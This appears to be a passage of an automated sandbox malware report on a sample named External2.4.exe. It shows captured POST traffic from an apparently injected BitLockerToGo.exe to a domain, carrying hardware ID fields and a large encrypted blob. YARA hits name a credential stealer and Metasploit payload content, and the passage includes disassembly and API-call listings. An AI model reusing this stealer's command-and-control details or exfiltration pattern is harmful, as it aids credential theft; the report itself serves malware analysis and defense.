name="hwid"B70FCA7B9A301B2DC683EA0F4CB0333A--RAM8QHLHYLContent-Disposition: form-data; name="pid"1--RAM8QHLHYLContent-Disposition: form-data; name="lid"LPnhqo--bktgtpqvsoua--RAM8QHLHYLC
2024-12-27 22:58:43 UTC	1124	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 22:58:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ckhi8bbp3dkiaka9vmkh5a7fcg; expires=Tue, 22 Apr 2025 16:45:22 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ztEx0GcN9Hn0uRZXnShBseraYj3nK9M7I0mGt8Tcafqt82HNBOLy%2F4b24ah9MJbNoVAYOgs5R6QP5QitmmMcHTWgGE7dUrZ4iIQ3tiGQ0ED9S1Zy1n2bN%2FKsYWrJXfzQtWQGIrb9"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8ceabb4af53300-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1893&min_rtt=1892&rtt_var=710&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2851&recv_bytes=2123&delivery_rate=1543340&cwnd=236&unsent_bytes=0&cid=866a6265a12aeae7&ts=799&x=0"
2024-12-27 22:58:43 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-27 22:58:43 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49742	104.21.29.252	443	7120	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 22:58:45 UTC	283	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=YHCRQUUJGDYFTVA User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 565081 Host: icyidentifysu.click
2024-12-27 22:58:45 UTC	15331	OUT	Data Raw: 2d 2d 59 48 43 52 51 55 55 4a 47 44 59 46 54 56 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 37 30 46 43 41 37 42 39 41 33 30 31 42 32 44 43 36 38 33 45 41 30 46 34 43 42 30 33 33 33 41 0d 0a 2d 2d 59 48 43 52 51 55 55 4a 47 44 59 46 54 56 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 59 48 43 52 51 55 55 4a 47 44 59 46 54 56 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 62 6b 74 67 74 70 71 76 73 6f 75 61 0d 0a Data Ascii: --YHCRQUUJGDYFTVAContent-Disposition: form-data; name="hwid"B70FCA7B9A301B2DC683EA0F4CB0333A--YHCRQUUJGDYFTVAContent-Disposition: form-data; name="pid"1--YHCRQUUJGDYFTVAContent-Disposition: form-data; name="lid"LPnhqo--bktgtpqvsoua
2024-12-27 22:58:45 UTC	15331	OUT	Data Raw: 56 50 9d 31 ab 05 5e ef 78 fc bc 35 bd a5 f4 99 07 9c e1 46 33 54 e8 4f e9 a5 9d 68 88 f4 97 c4 d2 88 3c 4f 8e 17 e0 ac 5d 91 42 ca 09 2c 65 9b 05 ba c4 9a d0 6b 10 74 5c 15 2b fe 30 58 6b fc bd cf 4f 90 7d 0f 68 bb 59 f3 00 d2 7f 62 80 b2 87 b5 63 ce b0 af d8 fa fc 73 ae 5a 1b e8 67 38 72 db d4 87 3b b0 25 29 b3 28 a0 35 78 3f 76 f2 fc 92 ca c7 2e 0f e0 d7 a5 a4 7c f5 c5 ca 3d 8b a7 c9 5b 97 aa af 2c 9a 1b b0 07 0b 8a fa 24 55 8b af 04 df 9b fc 7d 1c f1 0f 13 5e f0 e4 b2 9d a5 13 c4 a0 34 9b 68 93 a8 25 32 f0 ad 84 bc 8e 4a db 87 10 61 fd e6 fb 10 40 2f be 8b dc 09 88 0b 7a ff fb 40 4d 11 15 f4 89 53 8c 0d cf d4 a4 c5 42 cc 33 6b be ff 1c 47 ec e1 ea f0 c8 5e 78 b4 3d c3 25 3e d7 f0 74 98 db 71 cb c9 ad 2f 36 b4 6b ea dd 44 28 9d 0f 8f 37 6d 80 1b e5 36 Data Ascii: VP1^x5F3TOh<O]B,ekt\+0XkO}hYbcsZg8r;%)(5x?v.\|=[,$U}^4h%2Ja@/z@MSB3kG^x=%>tq/6kD(7m6
2024-12-27 22:58:45 UTC	15331	OUT	Data Raw: 4e b0 44 40 f1 5d 7e 1e d4 95 a9 6e 24 19 63 7e f0 1b 97 4a fd 94 ed b9 3b f8 e7 a3 93 47 51 57 7a 30 e9 a6 ed 99 0a 6b 5c 00 e2 cd 5e f6 b7 f3 fa 66 6c 14 8b 5a 0d 7e 48 37 48 61 66 3e e6 c6 8e 85 17 29 c0 38 67 7f 79 eb 37 88 28 4f 84 d2 8c 0d c9 46 c9 63 59 93 28 58 77 8f 5a f5 b3 4d 95 c1 c0 e2 dd c4 42 ce 94 c2 a7 40 ef 09 fb e7 9f 7e 76 eb ee 72 c1 ce 78 32 39 77 da ae d6 c4 b6 ad fb 63 18 1e 1d 6c 2d 81 68 6a bc 87 17 ff ab fd c4 99 1e 0b 1e 4e ad 8f 38 ee f6 15 ed 34 c1 43 4b 17 5e ca 3a a4 b7 2e 3c 2a 5a 14 f9 d1 6b 8c f3 19 3d 2c d3 c9 0d 81 66 50 9f d2 5e fe d8 cc 6b dd f3 e9 17 41 f3 4f 9b c4 52 5a 86 a0 00 6a 3c fc 49 db e9 d0 69 f1 7d 6a fb b2 90 2d 97 29 8d 3e 64 5d b1 11 e2 a2 5b 7e 5d 58 7e 22 8c 07 f8 b6 6e cd b4 54 13 52 ce c5 20 5f 95 Data Ascii: ND@]~n$c~J;GQWz0k\^flZ~H7Haf>)8gy7(OFcY(XwZMB@~vrx29wcl-hjN84CK^:.<*Zk=,fP^kAORZj<Ii}j-)>d][~]X~"nTR _
2024-12-27 22:58:45 UTC	15331	OUT	Data Raw: 92 0b 78 f2 3e 08 6b 3d b8 d8 7c 99 d9 76 fc cb 3b 8d 6e 60 ab 82 62 e7 08 eb bb b3 a1 24 18 96 dd 8c cc e6 24 01 d8 79 38 23 2a b0 31 22 48 98 90 15 ca d9 1d 3a 25 46 75 94 fd b9 61 3c f6 d0 41 a1 f0 87 91 dc ab de 1b 53 95 87 70 aa aa c8 7f 82 03 b6 bc 76 78 17 57 2a 7c 33 e6 e4 c0 81 76 85 ad 06 9d d3 38 ce 29 99 9b 6b 5f 41 26 a5 da 5e 42 98 77 aa 8f b3 39 7a ca fb 4b a9 d5 dd e8 e8 0c 13 88 43 68 72 66 ca 44 fb f0 01 8f ac 52 be ff d3 b1 f5 ff 79 f5 06 f5 7f 46 07 e7 5d be e5 2d 48 1d 38 94 53 b1 73 4c 2b 12 b3 9c 6b 62 20 bd db 13 ae c3 96 14 39 82 54 73 19 98 0f 53 9e f7 16 2d de 2b ba d9 b1 60 6a 45 bc 34 57 f0 1c ea eb cc 62 9f 28 bf 84 04 eb 6b 0b 9f 91 6b 6a fe 12 40 c5 19 7a db 34 6c 7c 22 b9 ec f5 24 cd 92 cb e7 62 78 4b fb 52 3e 22 96 c7 65 Data Ascii: x>k=\|v;n`b$$y8#1"H:%Fua<ASpvxW\|3v8)k_A&^Bw9zKChrfDRyF]-H8SsL+kb 9TsS-+`jE4Wb(kkj@z4l\|"$bxKR>"e
2024-12-27 22:58:45 UTC	15331	OUT	Data Raw: a9 0c 5b 02 fa 35 66 20 3e f7 e5 e1 8d 4d 3c c1 21 ec f5 13 e2 99 8f 7d c6 a4 2d cf 67 ca 0d 85 82 50 14 ac 1d a5 84 bd 48 fc 12 ba db 6a 23 78 aa 39 6a ed 6d 72 d0 bd c9 4b 46 de e8 5f 12 66 a6 19 fe c8 87 2f 13 3b ad b6 c4 d5 14 6a ed 7b 75 c2 46 64 c4 c9 a4 a3 9a c8 ce 05 53 5c 94 02 44 f4 78 88 eb e5 da c0 40 5c 0b de f1 3a b0 6e 67 02 3f c1 21 7c 57 60 69 cc 31 4d 30 9a 01 49 4a 5a c9 de b0 83 53 6e 2e 7f f3 2d 63 58 8d 65 86 04 7a d4 c8 e1 15 c4 f4 bc a0 69 76 b9 bb 56 af b9 ff bc b8 19 27 db 57 7f 19 91 ea 69 b1 37 94 42 5f 3d 9c 5e b9 8b 19 53 d3 c0 9a c6 0d df fe 92 c4 b6 3e 0e fe ab 36 b4 74 15 ce 8b 94 9c c4 c4 d1 d7 d9 9b 54 04 30 9b 8e ba 2b f0 05 f6 89 ef 2b 78 16 46 4d af 37 f4 47 3c 14 4a 7c a6 01 9a 88 a8 7b 2f 7f 02 e9 35 76 98 7a 10 c7 Data Ascii: [5f >M<!}-gPHj#x9jmrKF_f/;j{uFdS\Dx@\:ng?!\|W`i1M0IJZSn.-cXezivV'Wi7B_=^S>6tT0++xFM7G<J\|{/5vz
2024-12-27 22:58:45 UTC	15331	OUT	Data Raw: ff c1 a8 45 34 8e 8a ef 39 67 f7 0b 19 86 d5 97 df fa bc ae 3b 05 c7 00 e2 67 cc de 8b 96 f5 f8 e6 56 d0 55 41 aa 2a bb 50 f7 2e 3d 5a 78 b9 14 01 8f e8 28 e2 2c a6 58 5f 5f d6 14 25 ab c5 98 50 0f ac d3 8e 4f c9 ed a7 70 b3 b4 39 13 f3 6b 0d c7 39 94 1f 01 24 18 f8 2d a0 c9 1c b8 2b 30 c7 7f fd 7a 9f 68 a4 22 ea f2 b2 2b 44 7c 77 13 e4 d6 87 d6 0a e0 8e c5 ec be 7b 63 5f 79 24 32 4c e2 55 27 42 e0 59 b0 e2 72 b1 17 41 85 b3 48 90 28 25 73 d5 ad b9 0d 91 eb 32 c3 09 e1 32 65 7f d7 0e ec b8 8f 65 f8 83 a3 da 11 de 0e 3a 0a 71 c3 1f 4b ad b2 29 11 24 dd a5 84 35 7a 79 93 58 38 76 42 82 92 73 d1 49 0a ba 6a e6 e6 ca 2b 04 ee e2 d3 a7 34 d4 a3 b2 f6 46 4c 66 e6 7f b5 8d d0 99 b2 70 88 90 e4 2a 6b eb 4f 56 1f 62 1f 77 97 51 0f fc 30 bf f8 9a fd 35 19 b3 c5 a8 Data Ascii: E49g;gVUAP.=Zx(,X__%POp9k9$-+0zh"+D\|w{c_y$2LU'BYrAH(%s22ee:qK)$5zyX8vBsIj+4FLfpkOVbwQ05
2024-12-27 22:58:45 UTC	15331	OUT	Data Raw: 7e 23 70 06 18 10 15 2a aa 29 58 27 40 19 1f b1 04 f5 51 aa 39 da 53 71 63 9a 07 f4 76 81 35 1e c1 8f c4 ce 7f a3 7d 68 de cc 4d 5b 7b a2 cb aa dc 27 38 8f 6b 24 d3 c9 5f cc 21 30 67 ef 97 f6 2e 70 7d d0 e1 41 64 e0 5b 55 6e ef d9 ca d5 47 ef 4e da 24 34 b2 93 0a 34 7c 39 c2 82 6c 57 1c 70 fd cb c1 9e 8f 71 c6 31 4d c5 9f 53 d3 46 83 cb af 94 bc 6b bc dd 7a 76 6c 3b 6d f0 42 d1 ce 98 a9 1d b0 fb e2 87 cd d9 8f 18 ff 62 d6 e7 e9 e5 ca 75 0e 12 73 43 84 8c a0 7f 0f ed ab b1 5d 55 0b 05 f3 b1 13 b3 ab ba b3 9e 9f 69 4b 49 b3 85 3d 19 3d 7d 87 3c 4a fb 4e 94 ce 68 1e 9a 91 7d e3 91 b2 2a ec ff e3 e3 d5 d9 27 36 99 c5 49 d7 cb 7f f7 05 fe 78 3f fb da c6 c3 eb 50 bf 50 df b4 47 d9 84 13 73 45 f6 fa 0d fb b0 8a e0 17 a5 d0 46 77 47 9f 55 86 6c c5 a8 ac db a9 4b Data Ascii: ~#p)X'@Q9Sqcv5}hM[{'8k$_!0g.p}Ad[UnGN$44\|9lWpq1MSFkzvl;mBbusC]UiKI==}<JNh}'6Ix?PPGsEFwGUlK
2024-12-27 22:58:45 UTC	15331	OUT	Data Raw: 36 67 5d ef 6d 9e be 30 59 f5 94 a6 75 4d 39 2f 05 59 5f 8d 2f 01 48 a1 83 70 5c cb 45 9d cd 7b 4e ac 41 6d ba c1 14 5b 99 f2 45 f4 81 43 cc ec 35 76 c2 49 7d b9 09 be 69 f9 25 2a df fc 3e 30 a2 ae b9 c5 4d 1e d6 51 27 69 f1 5b 32 09 f2 7f c7 f5 9e 0a 53 8d 4b 9e 93 2a 35 cf 33 63 d4 05 c9 5c 3e b8 70 d1 97 d9 55 2d 12 11 e4 a7 40 3d 3e 39 8a ac b7 14 c5 2e 26 4f dd bc 23 5c 15 68 aa e2 3b 20 ba 31 c1 26 df 8b a5 a4 22 f9 b6 cc fb ca 60 14 87 4b 0b 0f 6f d3 c4 e4 3d ce 73 76 b1 81 a1 be 5d d5 87 ec 30 89 2f 80 e0 6e bb 8e 00 93 a9 b2 cc 34 e7 34 59 14 70 c3 a0 92 52 91 a8 c3 72 d2 16 38 38 2e 1e e7 2a 9e 41 68 e4 ad fd d7 b7 bf 6d 0a d3 9d 23 02 5c 58 29 2b ff 3c 7f 77 a5 32 22 a8 d7 fc a9 ff 1f ba c2 1f 07 e9 55 27 92 88 12 65 49 80 79 a9 49 94 21 fa f6 Data Ascii: 6g]m0YuM9/Y_/Hp\E{NAm[EC5vI}i%>0MQ'i[2SK53c\>pU-@=>9.&O#\h; 1&"`Ko=sv]0/n44YpRr88.*Ahm#\X)+<w2"U'eIyI!
2024-12-27 22:58:45 UTC	15331	OUT	Data Raw: a1 9e 62 81 07 35 ad 47 06 9c dd 9e 87 20 79 cb 0a b0 5f 05 13 30 1d 3d 11 99 09 f1 cd a6 ff 54 72 a9 6d 5e 64 53 6b 33 82 32 cd a4 f9 c0 3f 7e 98 9d 9a 7c 0d 48 18 a5 03 5a 0d 57 4f 9a af dc c4 dd 95 2c 5e 58 f3 1d 7e dc be e8 03 8a ac ad 05 9d 8f 71 6d c2 5d 4e 51 06 e7 bd bb ec 6d 1e 51 f2 5c b5 94 c6 38 8b f2 a3 43 27 7b 54 bb 19 6b 48 a0 b1 58 ea 43 1a 98 30 ca e1 b7 35 76 63 4a 64 ba 91 4c 14 9e f1 4d de ba 20 7f 17 c9 88 8d 15 da 28 44 c7 4c cf f3 9d dd d9 5d 8f ff 9e 1a 0b 49 3c 17 77 83 8d bd 59 a7 0b f2 97 79 52 a8 1b a2 ed f5 82 bd 31 d6 7b 1f 37 86 0d 66 7d c5 15 ce 86 38 7c df 26 a2 99 f1 d9 dc 24 5b 0b 8c 99 18 71 26 09 4f 93 88 15 3c 76 04 9f a0 14 92 ab 38 ef 0e 1c f4 14 e6 87 35 29 e5 a8 4c 9d 96 c4 dd 83 b4 91 07 52 d3 e2 e0 7b 5f f3 9a Data Ascii: b5G y_0=Trm^dSk32?~\|HZWO,^X~qm]NQmQ\8C'{TkHXC05vcJdLM (DL]I<wYyR1{7f}8\|&$[q&O<v85)LR{_
2024-12-27 22:58:45 UTC	15331	OUT	Data Raw: d4 17 ab e5 c1 81 af af 23 62 c1 a2 57 3d ba 02 da 45 17 01 ae 93 10 e3 90 ba 0a 90 b9 52 30 a2 ba fa 0d 05 2b ee 59 74 30 0c eb 2b 69 41 d0 5f 6d 3b aa f9 7f cb e0 03 90 1b b0 b8 03 bc c3 53 bd 10 30 f2 06 d6 e7 12 b0 5e b4 5a f7 94 ce 52 e7 db a9 ae 66 99 d1 15 85 92 37 1e df 37 73 db fe 53 61 1f b3 bd 24 d0 20 9f 28 71 87 21 96 59 3b 14 70 6c 95 99 ff d4 7e e4 d5 d0 1a 71 71 4e 0a f5 9d 3f 8c 6f 8a d2 98 3f 2c 9d 5a 2e ee 91 5d ac 06 ee c5 fb 21 7a ed fd c4 64 29 60 60 27 8a 02 e3 4a 61 aa e2 a0 f7 fd d8 93 af 2a c2 dc 42 49 2a 01 74 20 6a 6b 11 24 63 cf 92 cb db 72 1b 6a 03 c9 c4 6e 95 01 59 60 8d 75 94 82 52 0e 25 be da 33 93 5a 44 f2 06 62 33 02 e0 a5 71 09 56 6e 27 78 fa 72 bb 76 90 f4 c7 a0 93 4c 55 d4 ba 27 c4 67 ad 32 88 ab 5e 25 08 53 cb 08 e9 Data Ascii: #bW=ER0+Yt0+iA_m;S0^ZRf77sSa$ (q!Y;pl~qqN?o?,Z.]!zd)``'JaBIt jk$crjnY`uR%3ZDb3qVn'xrvLU'g2^%S
2024-12-27 22:58:48 UTC	1131	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 22:58:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=7jse05m7688aukgoqdcv73l3s8; expires=Tue, 22 Apr 2025 16:45:26 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bisRyYnJkUgfvkbcbL1YNEzjejdTOs8hengiv3PEUaASq1Ah9LsrXrZgiHoSBMzK11s3L5FrHnNTlfsMslAyAlOX%2BB2PC8U6efADnAeBwDGWYt4WPZhFdNEp1u04umEe%2BCYxnGnf"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8ceacb0aac726f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1798&min_rtt=1789&rtt_var=689&sent=310&recv=588&lost=0&retrans=0&sent_bytes=2850&recv_bytes=567606&delivery_rate=1568206&cwnd=172&unsent_bytes=0&cid=efa71e8494ff720c&ts=3292&x=0"

Target ID:	0
Start time:	17:57:59
Start date:	27/12/2024
Path:	C:\Users\user\Desktop\External2.4.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\External2.4.exe"
Imagebase:	0xb70000
File size:	14'573'568 bytes
MD5 hash:	97766C06578A790FF8F28BAF21F70695
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000002.1960437943.000000000B508000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	17:58:25
Start date:	27/12/2024
Path:	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Imagebase:	0xed0000
File size:	231'736 bytes
MD5 hash:	A64BEAB5D4516BECA4C40B25DC0C1CD8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.2079108699.00000000031A0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Function 00BA4300 Relevance: 11.4, Strings: 9, Instructions: 172COMMON

Download Yara Rule

Strings

)*.*/*=+++-+=, ---=->.*...\._/*///=/\/i/v000102030405060708090X0b0n0o0s0x10111213141516171819202122232425262728292A2B3031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576777879808182838485868788899091929394959699: :/:=, xrefs: 00BA44EF
runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=subchannel %d references invalid parent ID %dtransform: input and output are not identicaltransitioning GC to the same state as before?transport: failed to write client p, xrefs: 00BA458C
VirtualQuery for stack base failedWert muss eine E-Mail-Adresse seinWert muss kleiner als '%[1]s' sein" is anonymous but has PkgPath setadding nil Certificate to CertPoolbad tag in lazy extension decodingbad wiretype for oneof field in %Tcan't evaluate field %, xrefs: 00BA4565
runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedsysMemStat overflowtemplate: %s:%d: %stoo many open filestype_invalid_numberunclosed left parenunexpected %s in %sunexpected In, xrefs: 00BA449B
runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime:, xrefs: 00BA4531
%, xrefs: 00BA4624
: duplicatehandle failedruntime: allocation size out of rangeruntime: unexpected SPWRITE function setprofilebucket: profile already setstartTheWorld: inconsistent mp->nextpstrings: Repeat count causes overflowtimestamp (%v) has out-of-range nanost, xrefs: 00BA461B
: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=subchannel %d references invalid parent ID %dtransform: input and output are not identicaltransitioning GC to the same state , xrefs: 00BA45E7
bad g0 stackbad recoveryblacksquare;block clausecaller errorcan't happencas64 failedchan receivecircledcirc;circleddash;close notifyconstructioncontent-typecontext.TODOcurlyeqprec;curlyeqsucc;debug_redactdial timeoutdiamondsuit;disable-syncdouble_valuedumping , xrefs: 00BA450A

Memory Dump Source

Source File: 00000000.00000002.1956131522.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1956107787.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957148112.0000000001176000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957148112.0000000001380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957148112.0000000001387000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957897521.0000000001814000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957913854.0000000001815000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957929164.0000000001823000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957982056.00000000018D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957997614.00000000018D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1958011525.00000000018D3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1958024825.00000000018D6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1958037236.00000000018D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1958050134.00000000018D9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1958062485.00000000018DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1958074606.00000000018DD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1958087549.00000000018DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1958087549.00000000018E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1958087549.0000000001908000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1958087549.000000000190D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1958087549.0000000001920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1958167742.0000000001931000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1958181474.0000000001932000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1958181474.000000000199C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_External2.jbxd

Similarity

API ID:
String ID: : duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=subchannel %d references invalid parent ID %dtransform: input and output are not identicaltransitioning GC to the same state $ : duplicatehandle failedruntime: allocation size out of rangeruntime: unexpected SPWRITE function setprofilebucket: profile already setstartTheWorld: inconsistent mp->nextpstrings: Repeat count causes overflowtimestamp (%v) has out-of-range nanost$%$)*.*/*=+++-+=, ---=->.*...\._/*///=/\/i/v000102030405060708090X0b0n0o0s0x10111213141516171819202122232425262728292A2B3031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576777879808182838485868788899091929394959699: :/:=$VirtualQuery for stack base failedWert muss eine E-Mail-Adresse seinWert muss kleiner als '%[1]s' sein" is anonymous but has PkgPath setadding nil Certificate to CertPoolbad tag in lazy extension decodingbad wiretype for oneof field in %Tcan't evaluate field %$bad g0 stackbad recoveryblacksquare;block clausecaller errorcan't happencas64 failedchan receivecircledcirc;circleddash;close notifyconstructioncontent-typecontext.TODOcurlyeqprec;curlyeqsucc;debug_redactdial timeoutdiamondsuit;disable-syncdouble_valuedumping $runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=subchannel %d references invalid parent ID %dtransform: input and output are not identicaltransitioning GC to the same state as before?transport: failed to write client p$runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime:$runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedsysMemStat overflowtemplate: %s:%d: %stoo many open filestype_invalid_numberunclosed left parenunexpected %s in %sunexpected In
API String ID: 0-1852748684
Opcode ID: 98b956e735d02a50a04f110cb2ae195f9b644f2626238ed823f4a30527bbf446
Instruction ID: f25af2bc1e2cbc0e1918d225a433b958d8aef5c771d0bd4becad73d7a544c22b
Opcode Fuzzy Hash: 98b956e735d02a50a04f110cb2ae195f9b644f2626238ed823f4a30527bbf446
Instruction Fuzzy Hash: CA81D0B450D7019FD310EF64D18975ABBE0AF8A708F0089ADE49887342EBB5D949DF52

Analysis Process: BitLockerToGo.exePID: 7120, Parent PID: 6892COMMON

Execution Graph

Execution Coverage:	8.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	59.5%
Total number of Nodes:	378
Total number of Limit Nodes:	20

Executed Functions

Function 00436980 Relevance: 40.9, APIs: 11, Strings: 12, Instructions: 655
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(0044068C,00000000,00000001,0044067C), ref: 00436BF0
SysAllocString.OLEAUT32(10401E4F), ref: 00436C79
CoSetProxyBlanket.COMBASE(CDC9F5CC,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00436CB6
SysAllocString.OLEAUT32(02B000B8), ref: 00436D1F
SysAllocString.OLEAUT32(105A1E4E), ref: 00436DE0
VariantInit.OLEAUT32(QJKL), ref: 00436E4B
VariantClear.OLEAUT32(?), ref: 00436FD2
SysFreeString.OLEAUT32(00000000), ref: 00436FF3
SysFreeString.OLEAUT32(?), ref: 00436FF9
SysFreeString.OLEAUT32(00000000), ref: 0043700A
GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00437045

Strings

vW}Z, xrefs: 00437090
n)`, xrefs: 00436D47
8e, xrefs: 00436B3C
3b<d, xrefs: 00436D4F
zW}Z, xrefs: 004370C0
)MNO, xrefs: 00436A27
{@8#, xrefs: 00436BB8
MN, xrefs: 00436D87
7v.H, xrefs: 00436D77
, xrefs: 0043713E, 00437142
QJKL, xrefs: 004369CB, 00436A78
0j6l, xrefs: 00436C16

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID: String$AllocFree$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
String ID: n)`$)MNO$0j6l$3b<d$7v.H$8e$MN$QJKL$vW}Z$zW}Z${@8#$
API String ID: 2573436264-1928758774
Opcode ID: e5f7feb958a2fba7e1dba6e17a6dafd2a0e28881f2d43109f9219ad7023b5c9c
Instruction ID: 6c0b44996c03eb0e40192bf62832c839fb6e79de9a0b651ada1dc03bcec214e4
Opcode Fuzzy Hash: e5f7feb958a2fba7e1dba6e17a6dafd2a0e28881f2d43109f9219ad7023b5c9c
Instruction Fuzzy Hash: 79120D72A08351ABD310CF64C880B6BBBE5EFC9314F15892DE9D5AB390D779D805CB86

